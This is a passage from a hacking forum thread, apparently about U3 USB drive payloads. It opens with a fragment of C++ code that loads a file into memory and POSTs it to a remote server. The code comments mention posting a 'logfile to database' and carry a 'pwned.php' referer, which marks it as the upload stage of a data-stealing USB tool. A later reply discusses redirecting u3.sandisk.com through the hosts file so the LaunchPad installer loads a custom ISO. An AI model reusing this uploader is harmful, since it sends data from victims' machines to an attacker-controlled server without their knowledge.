file that big //So lets make max 1024KB (1MB) even though you wont even send that much xClient* cli = new xClient; char* postdata = new char[1048576]; unsigned long datalength = 0; ZeroMemory(postdata, 1048576); datalength = (strlen(file) + sendme.size() + 5); //(+5 because "t=&f=" count as content) sprintf(postdata, "POST %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nAccept: %s\r\nKeep-Alive: 300\r\nconnection: keep-alive\r\nReferer: http://localhost/pwned.php\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %i\r\n\r\nt=%s&f=", path, host, UserAgent.c_str(), Accept.c_str(), datalength, file); sendme.insert(0, postdata); if(cli->ConnectToServer(host, port) == 0) { printf("\nFailed to connect to server!\n"); ExitProcess(0); } //Post logfile to database :) sendx(cli->serversock, (char*)sendme.c_str(), sendme.size()); cli->Close(); printf("\n\nFile Sent Successfully!\n\n"); //just so you get an idea of what was sent to the webserver //keep this commented out //f = fopen("SentData.txt", "wb"); //fwrite(sendme.c_str(), sendme.size(), 1, f); //fclose(f); //Clean up delete cli; delete[] postdata; return TRUE; } long getfilesize(FILE* f) { long temp; fseek(f, 0, SEEK_END); temp = ftell(f); rewind(f); return temp; } bool LoadFileIntoMemory() { f = fopen(file, "rb"); if(!f) return FALSE; fsize = getfilesize(f); fbuff = new char[fsize]; fread(fbuff, fsize, 1, f); fclose(f); return TRUE; } void XORbuffer(char* buff, DWORD buffsize, char* pass) // Simple Encryption -- currently not used... { int x = 0; int passlength = strlen(pass); for(DWORD i = 0; i < buffsize; i++) { if(x == passlength) { x = 0; } buff[i] ^= pass[x]; // ^ means XOR in c++;) x++; } }
  24. I had tried this a long time ago, and I recently tried it again it does not work for me! I have an apache web server running on my machine... If I modify my hosts file and and point u3.sandisk.com to When I try to run lpinstaller it fails immediately! It says "Download of u3 launchpad failed!" exactly like this image that someone posted: it does not even seem like it tries to download it, and just immediately says download failed! I have my directory structure setup correctly you can double check: http://popeax.com/download/apps/lpinstaller/isofiles/ (popeax.com is my domain name, which forwards to my ip address) also you claim: Step 8. None of the data on the flash partition will not be touched. When I ran it it said my data would have to be backed up, and it gave me the option to backup the data or format the drive!!! <_< I had downloaded the latest version of lpinstaller from the website too! Also I tried looking through the EXE in olly and a hex editor and I did not find "u3.sandisk.com" or /download/apps/lpinstaller/isofiles/" or anything in between! not in ascii or unicode!! So i'm not sure how you found those strings. If I could find those strings I could easily mod it to point somewhere else since the EXE is not packed! but it still probably wont work (at least for me) the closest thing I found was "u3.com" but thats all... Anyways, I don't have vista but I don't see why that would matter...
  25. Just remember, winners don't do wares! ;)
  • Create New...